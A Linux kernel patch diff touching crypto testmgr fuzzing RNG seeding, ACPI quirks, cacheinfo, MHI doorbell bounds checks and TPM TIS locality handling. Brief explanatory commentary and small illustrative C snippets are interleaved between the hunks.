+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_aead_testvec(generic_req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, generic_req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+ 					     sizeof(ctx->vec_name), false);
+-		generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++		generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++					       ctx->cfgname,
+ 					       sizeof(ctx->cfgname));
+ 		if (!ctx->vec.novrfy) {
+ 			err = test_aead_vec_cfg(ENCRYPT, &ctx->vec,
+@@ -2533,6 +2595,7 @@ static int test_aead_extra(const struct alg_test_desc *test_desc,
+ 	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+ 		return -ENOMEM;
++	init_rnd_state(&ctx->rng);
+ 	ctx->req = req;
+ 	ctx->tfm = crypto_aead_reqtfm(req);
+ 	ctx->test_desc = test_desc;
+@@ -2922,11 +2985,14 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_skcipher_vec_cfg(enc, vec, vec_name,
+ 						    &cfg, req, tsgls);
+@@ -2944,7 +3010,8 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+  * Generate a symmetric cipher test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_cipher_testvec(struct skcipher_request *req,
++static void generate_random_cipher_testvec(struct rnd_state *rng,
++					   struct skcipher_request *req,
+ 					   struct cipher_testvec *vec,
+ 					   unsigned int maxdatasize,
+ 					   char *name, size_t max_namelen)
+@@ -2958,17 +3025,17 @@ static void generate_random_cipher_testvec(struct skcipher_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (get_random_u32_below(4) == 0)
+-		vec->klen = get_random_u32_below(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_skcipher_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Plaintext */
+-	vec->len = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->ptext, vec->len);
++	vec->len = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->ptext, vec->len);
+ 
+ 	/* If the key couldn't be set, no need to continue to encrypt. */
+ 	if (vec->setkey_error)
+@@ -3010,6 +3077,7 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_skcipher_alg(tfm)->base.cra_name;
+ 	const char *driver = crypto_skcipher_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_skcipher *generic_tfm = NULL;
+ 	struct skcipher_request *generic_req = NULL;
+@@ -3027,6 +3095,8 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	if (strncmp(algname, "kw(", 3) == 0)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -3111,9 +3181,11 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_cipher_testvec(generic_req, &vec, maxdatasize,
++		generate_random_cipher_testvec(&rng, generic_req, &vec,
++					       maxdatasize,
+ 					       vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_skcipher_vec_cfg(ENCRYPT, &vec, vec_name,
+ 					    cfg, req, tsgls);
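
The whole testmgr conversion boils down to one pattern: seed a local
struct rnd_state once from the real RNG, then draw every fuzzing value
from it. A condensed usage sketch in the same spirit, not taken from the
file:

#include <linux/prandom.h>
#include <linux/random.h>

static void fuzz_round_demo(void)
{
        struct rnd_state rng;
        u8 buf[64];

        prandom_seed_state(&rng, get_random_u64());     /* seed once */
        /* Fast and fine for fuzz inputs, but NOT cryptographically
         * secure, which is exactly the trade-off the new comment in
         * testmgr.c spells out. */
        prandom_bytes_state(&rng, buf, sizeof(buf));
}
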
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index 7c16bc15e7a14..837cd86d0316b 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -589,6 +589,7 @@ static void acpi_device_remove_notify_handler(struct acpi_device *device,
+ 		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
+ 	}
++	acpi_os_wait_events_complete();
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+diff --git a/drivers/acpi/power.c b/drivers/acpi/power.c
+index 23507d29f0006..c2c70139c4f1d 100644
+--- a/drivers/acpi/power.c
++++ b/drivers/acpi/power.c
+@@ -23,6 +23,7 @@
+ 
+ #define pr_fmt(fmt) "ACPI: PM: " fmt
+ 
++#include <linux/dmi.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/init.h>
+@@ -1022,6 +1023,21 @@ void acpi_resume_power_resources(void)
+ }
+ #endif
+ 
++static const struct dmi_system_id dmi_leave_unused_power_resources_on[] = {
++	{
++		/*
++		 * The Toshiba Click Mini has a CPR3 power-resource which must
++		 * be on for the touchscreen to work, but which is not in any
++		 * _PR? lists. The other 2 affected power-resources are no-ops.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "SATELLITE Click Mini L9W-B"),
++		},
++	},
++	{}
++};
++
+ /**
+  * acpi_turn_off_unused_power_resources - Turn off power resources not in use.
+  */
+@@ -1029,6 +1045,9 @@ void acpi_turn_off_unused_power_resources(void)
+ {
+ 	struct acpi_power_resource *resource;
+ 
++	if (dmi_check_system(dmi_leave_unused_power_resources_on))
++		return;
++
+ 	mutex_lock(&power_resource_list_lock);
+ 
+ 	list_for_each_entry_reverse(resource, &acpi_power_resource_list, list_node) {
+diff --git a/drivers/acpi/processor_pdc.c b/drivers/acpi/processor_pdc.c
+index 8c3f82c9fff35..18fb04523f93b 100644
+--- a/drivers/acpi/processor_pdc.c
++++ b/drivers/acpi/processor_pdc.c
+@@ -14,6 +14,8 @@
+ #include <linux/acpi.h>
+ #include <acpi/processor.h>
+ 
++#include <xen/xen.h>
++
+ #include "internal.h"
+ 
+ static bool __init processor_physically_present(acpi_handle handle)
+@@ -47,6 +49,15 @@ static bool __init processor_physically_present(acpi_handle handle)
+ 		return false;
+ 	}
+ 
++	if (xen_initial_domain())
++		/*
++		 * When running as a Xen dom0 the number of processors Linux
++		 * sees can be different from the real number of processors on
++		 * the system, and we still need to execute _PDC for all of
++		 * them.
++		 */
++		return xen_processor_present(acpi_id);
++
+ 	type = (acpi_type == ACPI_TYPE_DEVICE) ? 1 : 0;
+ 	cpuid = acpi_get_cpuid(handle, type, acpi_id);
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index e85729fc481fd..295744fe7c920 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -299,20 +299,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
+-	/*
+-	 * Older models with nvidia GPU which need acpi_video backlight
+-	 * control and where the old nvidia binary driver series does not
+-	 * call acpi_video_register_backlight().
+-	 */
+-	{
+-	 .callback = video_detect_force_video,
+-	 /* ThinkPad W530 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
+-		},
+-	},
+-
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+diff --git a/drivers/acpi/viot.c b/drivers/acpi/viot.c
+index ed752cbbe6362..c8025921c129b 100644
+--- a/drivers/acpi/viot.c
++++ b/drivers/acpi/viot.c
+@@ -328,6 +328,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ {
+ 	u32 epid;
+ 	struct viot_endpoint *ep;
++	struct device *aliased_dev = data;
+ 	u32 domain_nr = pci_domain_nr(pdev->bus);
+ 
+ 	list_for_each_entry(ep, &viot_pci_ranges, list) {
+@@ -338,7 +339,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ 			epid = ((domain_nr - ep->segment_start) << 16) +
+ 				dev_id - ep->bdf_start + ep->endpoint_id;
+ 
+-			return viot_dev_iommu_init(&pdev->dev, ep->viommu,
++			return viot_dev_iommu_init(aliased_dev, ep->viommu,
+ 						   epid);
+ 		}
+ 	}
+@@ -372,7 +373,7 @@ int viot_iommu_configure(struct device *dev)
+ {
+ 	if (dev_is_pci(dev))
+ 		return pci_for_each_dma_alias(to_pci_dev(dev),
+-					      viot_pci_dev_iommu_init, NULL);
++					      viot_pci_dev_iommu_init, dev);
+ 	else if (dev_is_platform(dev))
+ 		return viot_mmio_dev_iommu_init(to_platform_device(dev));
+ 	return -ENODEV;
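
The viot.c fix threads the original device through the opaque data
pointer, so the IOMMU is configured for the device actually being probed
rather than for whichever alias the walk is visiting. A skeletal
callback showing the calling convention, not the driver code:

#include <linux/pci.h>

/* pci_for_each_dma_alias() invokes this once per alias; 'data' is
 * whatever the initiator passed, here the aliased device itself. */
static int each_alias_cb(struct pci_dev *alias, u16 alias_id, void *data)
{
        struct device *orig_dev = data;

        /* ... program the IOMMU for orig_dev using alias_id ... */
        return orig_dev ? 0 : -EINVAL;
}
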
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index f05acf3c16c6b..88205a240fb2e 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -38,11 +38,10 @@ static inline bool cache_leaves_are_shared(struct cacheinfo *this_leaf,
+ {
+ 	/*
+ 	 * For non DT/ACPI systems, assume unique level 1 caches,
+-	 * system-wide shared caches for all other levels. This will be used
+-	 * only if arch specific code has not populated shared_cpu_map
++	 * system-wide shared caches for all other levels.
+ 	 */
+ 	if (!(IS_ENABLED(CONFIG_OF) || IS_ENABLED(CONFIG_ACPI)))
+-		return !(this_leaf->level == 1);
++		return (this_leaf->level != 1) && (sib_leaf->level != 1);
+ 
+ 	if ((sib_leaf->attributes & CACHE_ID) &&
+ 	    (this_leaf->attributes & CACHE_ID))
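
The one-line cacheinfo fix matters because the old heuristic only looked
at this_leaf: comparing a CPU's L2 leaf against a sibling's L1 leaf could
wrongly report them as shared. The corrected fallback rule, restated as
a standalone predicate (illustrative only):

/* No DT/ACPI topology data: treat L1 as private per CPU and all
 * higher levels as system-wide, so both leaves must be above L1
 * before they can be considered shared. */
static int leaves_shared_fallback(unsigned int this_level,
                                  unsigned int sib_level)
{
        return this_level != 1 && sib_level != 1;
}
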
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index 4c98849577d4e..7af8e33735a36 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -487,7 +487,8 @@ static const struct attribute_group *cpu_root_attr_groups[] = {
+ bool cpu_is_hotpluggable(unsigned int cpu)
+ {
+ 	struct device *dev = get_cpu_device(cpu);
+-	return dev && container_of(dev, struct cpu, dev)->hotpluggable;
++	return dev && container_of(dev, struct cpu, dev)->hotpluggable
++		&& tick_nohz_cpu_hotpluggable(cpu);
+ }
+ EXPORT_SYMBOL_GPL(cpu_is_hotpluggable);
+ 
+diff --git a/drivers/base/platform.c b/drivers/base/platform.c
+index 968f3d71eeab2..a4938d1c8fe1d 100644
+--- a/drivers/base/platform.c
++++ b/drivers/base/platform.c
+@@ -1416,7 +1416,9 @@ static void platform_remove(struct device *_dev)
+ 	struct platform_driver *drv = to_platform_driver(_dev->driver);
+ 	struct platform_device *dev = to_platform_device(_dev);
+ 
+-	if (drv->remove) {
++	if (drv->remove_new) {
++		drv->remove_new(dev);
++	} else if (drv->remove) {
+ 		int ret = drv->remove(dev);
+ 
+ 		if (ret)
+diff --git a/drivers/block/drbd/drbd_receiver.c b/drivers/block/drbd/drbd_receiver.c
+index 757f4692b5bd8..1fc815be12d01 100644
+--- a/drivers/block/drbd/drbd_receiver.c
++++ b/drivers/block/drbd/drbd_receiver.c
+@@ -1283,7 +1283,7 @@ static void one_flush_endio(struct bio *bio)
+ static void submit_one_flush(struct drbd_device *device, struct issue_flush_context *ctx)
+ {
+ 	struct bio *bio = bio_alloc(device->ldev->backing_bdev, 0,
+-				    REQ_OP_FLUSH | REQ_PREFLUSH, GFP_NOIO);
++				    REQ_OP_WRITE | REQ_PREFLUSH, GFP_NOIO);
+ 	struct one_flush_context *octx = kmalloc(sizeof(*octx), GFP_NOIO);
+ 
+ 	if (!octx) {
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 02893600db390..795be33f2892d 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,7 +354,6 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
+-	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bus/mhi/host/boot.c b/drivers/bus/mhi/host/boot.c
+index 1c69feee17030..d2a19b07ccb88 100644
+--- a/drivers/bus/mhi/host/boot.c
++++ b/drivers/bus/mhi/host/boot.c
+@@ -391,6 +391,7 @@ void mhi_fw_load_handler(struct mhi_controller *mhi_cntrl)
+ {
+ 	const struct firmware *firmware = NULL;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	const char *fw_name;
+ 	void *buf;
+ 	dma_addr_t dma_addr;
+@@ -508,14 +509,18 @@ error_ready_state:
+ 	}
+ 
+ error_fw_load:
+-	mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-	wake_up_all(&mhi_cntrl->state_event);
++	write_lock_irq(&mhi_cntrl->pm_lock);
++	new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++	write_unlock_irq(&mhi_cntrl->pm_lock);
++	if (new_state == MHI_PM_FW_DL_ERR)
++		wake_up_all(&mhi_cntrl->state_event);
+ }
+ 
+ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ {
+ 	struct image_info *image_info = mhi_cntrl->fbc_image;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	int ret;
+ 
+ 	if (!image_info)
+@@ -526,8 +531,11 @@ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ 			       &image_info->mhi_buf[image_info->entries - 1]);
+ 	if (ret) {
+ 		dev_err(dev, "MHI did not load AMSS, ret:%d\n", ret);
+-		mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-		wake_up_all(&mhi_cntrl->state_event);
++		write_lock_irq(&mhi_cntrl->pm_lock);
++		new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++		write_unlock_irq(&mhi_cntrl->pm_lock);
++		if (new_state == MHI_PM_FW_DL_ERR)
++			wake_up_all(&mhi_cntrl->state_event);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/bus/mhi/host/init.c b/drivers/bus/mhi/host/init.c
+index bf672de351315..04fbccff65ac2 100644
+--- a/drivers/bus/mhi/host/init.c
++++ b/drivers/bus/mhi/host/init.c
+@@ -516,6 +516,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB)) {
++		dev_err(dev, "CHDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB));
++		return -ERANGE;
++	}
++
+ 	/* Setup wake db */
+ 	mhi_cntrl->wake_db = base + val + (8 * MHI_DEV_WAKE_DB);
+ 	mhi_cntrl->wake_set = false;
+@@ -532,6 +538,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings)) {
++		dev_err(dev, "ERDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings));
++		return -ERANGE;
++	}
++
+ 	/* Setup event db address for each ev_ring */
+ 	mhi_event = mhi_cntrl->mhi_event;
+ 	for (i = 0; i < mhi_cntrl->total_ev_rings; i++, val += 8, mhi_event++) {
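
The two added checks bound device-supplied doorbell offsets before they
become MMIO pointers: each doorbell is 8 bytes and indexed, so the
offset must leave 8 * index bytes of headroom inside the reg_len window.
The arithmetic isolated into a hedged helper, assuming reg_len at least
covers the doorbell array (name hypothetical):

#include <linux/types.h>

/* A doorbell lives at base + offset + 8 * db_index and must stay
 * inside the reg_len-byte register window, as the new CHDB/ERDB
 * checks above enforce. */
static bool db_offset_ok(size_t reg_len, u32 offset, u32 db_index)
{
        return offset < reg_len - (size_t)8 * db_index;
}
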
+diff --git a/drivers/bus/mhi/host/main.c b/drivers/bus/mhi/host/main.c
+index df0fbfee7b78b..0c3a009ed9bb0 100644
+--- a/drivers/bus/mhi/host/main.c
++++ b/drivers/bus/mhi/host/main.c
+@@ -503,7 +503,7 @@ irqreturn_t mhi_intvec_threaded_handler(int irq_number, void *priv)
+ 	}
+ 	write_unlock_irq(&mhi_cntrl->pm_lock);
+ 
+-	if (pm_state != MHI_PM_SYS_ERR_DETECT || ee == mhi_cntrl->ee)
++	if (pm_state != MHI_PM_SYS_ERR_DETECT)
+ 		goto exit_intvec;
+ 
+ 	switch (ee) {
+diff --git a/drivers/bus/mhi/host/pci_generic.c b/drivers/bus/mhi/host/pci_generic.c
+index f39657f71483c..cb5c067e78be1 100644
+--- a/drivers/bus/mhi/host/pci_generic.c
++++ b/drivers/bus/mhi/host/pci_generic.c
+@@ -344,8 +344,6 @@ static const struct mhi_channel_config mhi_foxconn_sdx55_channels[] = {
+ 	MHI_CHANNEL_CONFIG_DL(13, "MBIM", 32, 0),
+ 	MHI_CHANNEL_CONFIG_UL(32, "DUN", 32, 0),
+ 	MHI_CHANNEL_CONFIG_DL(33, "DUN", 32, 0),
+-	MHI_CHANNEL_CONFIG_UL(92, "DUN2", 32, 1),
+-	MHI_CHANNEL_CONFIG_DL(93, "DUN2", 32, 1),
+ 	MHI_CHANNEL_CONFIG_HW_UL(100, "IP_HW0_MBIM", 128, 2),
+ 	MHI_CHANNEL_CONFIG_HW_DL(101, "IP_HW0_MBIM", 128, 3),
+ };
+diff --git a/drivers/char/ipmi/Kconfig b/drivers/char/ipmi/Kconfig
+index b6c0d35fc1a5f..f4adc6feb3b22 100644
+--- a/drivers/char/ipmi/Kconfig
++++ b/drivers/char/ipmi/Kconfig
+@@ -162,7 +162,8 @@ config IPMI_KCS_BMC_SERIO
+ 
+ config ASPEED_BT_IPMI_BMC
+ 	depends on ARCH_ASPEED || COMPILE_TEST
+-	depends on REGMAP && REGMAP_MMIO && MFD_SYSCON
++	depends on MFD_SYSCON
++	select REGMAP_MMIO
+ 	tristate "BT IPMI bmc driver"
+ 	help
+ 	  Provides a driver for the BT (Block Transfer) IPMI interface
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index f49d2c2ef3cfd..273ad74d0b4cf 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -564,8 +564,10 @@ static void retry_timeout(struct timer_list *t)
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
+-	if (resend)
++	if (resend) {
+ 		start_resend(ssif_info);
++		ssif_inc_stat(ssif_info, send_retries);
++	}
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -792,9 +794,9 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 		} else if (data[0] != (IPMI_NETFN_APP_REQUEST | 1) << 2
+ 			   || data[1] != IPMI_GET_MSG_FLAGS_CMD) {
+ 			/*
+-			 * Don't abort here, maybe it was a queued
+-			 * response to a previous command.
++			 * Recv error response, give up.
+ 			 */
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Invalid response getting flags: %x %x\n",
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index c467eeae99733..bd6ebc66a55a9 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -683,7 +683,8 @@ EXPORT_SYMBOL_GPL(tpm_chip_register);
+ void tpm_chip_unregister(struct tpm_chip *chip)
+ {
+ 	tpm_del_legacy_sysfs(chip);
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip))
++	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip) &&
++	    !tpm_amd_is_rng_defective(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ 	tpm_bios_log_teardown(chip);
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2 && !tpm_is_firmware_upgrade(chip))
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 3f98e587b3e84..eecfbd7e97867 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -136,16 +136,27 @@ static bool check_locality(struct tpm_chip *chip, int l)
+ 	return false;
+ }
+ 
+-static int release_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_relinquish_locality(struct tpm_tis_data *priv, int l)
++{
++	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++
++	return 0;
++}
++
++static int tpm_tis_relinquish_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++	mutex_lock(&priv->locality_count_mutex);
++	priv->locality_count--;
++	if (priv->locality_count == 0)
++		__tpm_tis_relinquish_locality(priv, l);
++	mutex_unlock(&priv->locality_count_mutex);
+ 
+ 	return 0;
+ }
+ 
+-static int request_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_request_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 	unsigned long stop, timeout;
+@@ -186,6 +197,20 @@ again:
+ 	return -1;
+ }
+ 
++static int tpm_tis_request_locality(struct tpm_chip *chip, int l)
++{
++	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
++	int ret = 0;
++
++	mutex_lock(&priv->locality_count_mutex);
++	if (priv->locality_count == 0)
++		ret = __tpm_tis_request_locality(chip, l);
++	if (!ret)
++		priv->locality_count++;
++	mutex_unlock(&priv->locality_count_mutex);
++	return ret;
++}
++
+ static u8 tpm_tis_status(struct tpm_chip *chip)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+@@ -652,7 +677,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 	if (vendor != TPM_VID_INTEL)
+ 		return 0;
+ 
+-	if (request_locality(chip, 0) != 0)
++	if (tpm_tis_request_locality(chip, 0) != 0)
+ 		return -EBUSY;
+ 
+ 	rc = tpm_tis_send_data(chip, cmd_getticks, len);
+@@ -673,7 +698,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 
+ out:
+ 	tpm_tis_ready(chip);
+-	release_locality(chip, priv->locality);
++	tpm_tis_relinquish_locality(chip, priv->locality);
+ 
+ 	return rc;
+ }
+@@ -732,25 +757,17 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int tpm_tis_gen_interrupt(struct tpm_chip *chip)
++static void tpm_tis_gen_interrupt(struct tpm_chip *chip)
+ {
+ 	const char *desc = "attempting to generate an interrupt";
+ 	u32 cap2;
+ 	cap_t cap;
+ 	int ret;
+ 
+-	ret = request_locality(chip, 0);
+-	if (ret < 0)
+-		return ret;
+-
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2)
+ 		ret = tpm2_get_tpm_pt(chip, 0x100, &cap2, desc);
+ 	else
+ 		ret = tpm1_getcap(chip, TPM_CAP_PROP_TIS_TIMEOUT, &cap, desc, 0);
+-
+-	release_locality(chip, 0);
+-
+-	return ret;
+ }
+ 
+ /* Register the IRQ and issue a command that will cause an interrupt. If an
+@@ -773,52 +790,55 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	}
+ 	priv->irq = irq;
+ 
++	rc = tpm_tis_request_locality(chip, 0);
++	if (rc < 0)
++		return rc;
++
+ 	rc = tpm_tis_read8(priv, TPM_INT_VECTOR(priv->locality),
+ 			   &original_int_vec);
+-	if (rc < 0)
++	if (rc < 0) {
++		tpm_tis_relinquish_locality(chip, priv->locality);
+ 		return rc;
++	}
+ 
+ 	rc = tpm_tis_write8(priv, TPM_INT_VECTOR(priv->locality), irq);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	rc = tpm_tis_read32(priv, TPM_INT_STATUS(priv->locality), &int_status);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	/* Clear all existing */
+ 	rc = tpm_tis_write32(priv, TPM_INT_STATUS(priv->locality), int_status);
+ 	if (rc < 0)
+-		return rc;
+-
++		goto restore_irqs;
+ 	/* Turn on */
+ 	rc = tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality),
+ 			     intmask | TPM_GLOBAL_INT_ENABLE);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	priv->irq_tested = false;
+ 
+ 	/* Generate an interrupt by having the core call through to
+ 	 * tpm_tis_send
+ 	 */
+-	rc = tpm_tis_gen_interrupt(chip);
+-	if (rc < 0)
+-		return rc;
++	tpm_tis_gen_interrupt(chip);
+ 
++restore_irqs:
+ 	/* tpm_tis_send will either confirm the interrupt is working or it
+ 	 * will call disable_irq which undoes all of the above.
+ 	 */
+ 	if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-		rc = tpm_tis_write8(priv, original_int_vec,
+-				TPM_INT_VECTOR(priv->locality));
+-		if (rc < 0)
+-			return rc;
+-
+-		return 1;
++		tpm_tis_write8(priv, original_int_vec,
++			       TPM_INT_VECTOR(priv->locality));
++		rc = -1;
+ 	}
+ 
+-	return 0;
++	tpm_tis_relinquish_locality(chip, priv->locality);
++
++	return rc;
+ }
+ 
+ /* Try to find the IRQ the TPM is using. This is for legacy x86 systems that
+@@ -932,8 +952,8 @@ static const struct tpm_class_ops tpm_tis = {
+ 	.req_complete_mask = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_complete_val = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_canceled = tpm_tis_req_canceled,
+-	.request_locality = request_locality,
+-	.relinquish_locality = release_locality,
++	.request_locality = tpm_tis_request_locality,
++	.relinquish_locality = tpm_tis_relinquish_locality,
+ 	.clk_enable = tpm_tis_clkrun_enable,
+ };
+ 
+@@ -967,6 +987,8 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 	priv->timeout_min = TPM_TIMEOUT_USECS_MIN;
+ 	priv->timeout_max = TPM_TIMEOUT_USECS_MAX;
+ 	priv->phy_ops = phy_ops;
++	priv->locality_count = 0;
++	mutex_init(&priv->locality_count_mutex);
+ 
+ 	dev_set_drvdata(&chip->dev, priv);
+ 
+@@ -1013,14 +1035,14 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		   TPM_INTF_DATA_AVAIL_INT | TPM_INTF_STS_VALID_INT;
+ 	intmask &= ~TPM_GLOBAL_INT_ENABLE;
+ 
+-	rc = request_locality(chip, 0);
++	rc = tpm_tis_request_locality(chip, 0);
+ 	if (rc < 0) {
+ 		rc = -ENODEV;
+ 		goto out_err;
+ 	}
+ 
+ 	tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+-	release_locality(chip, 0);
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+ 	rc = tpm_chip_start(chip);
+ 	if (rc)
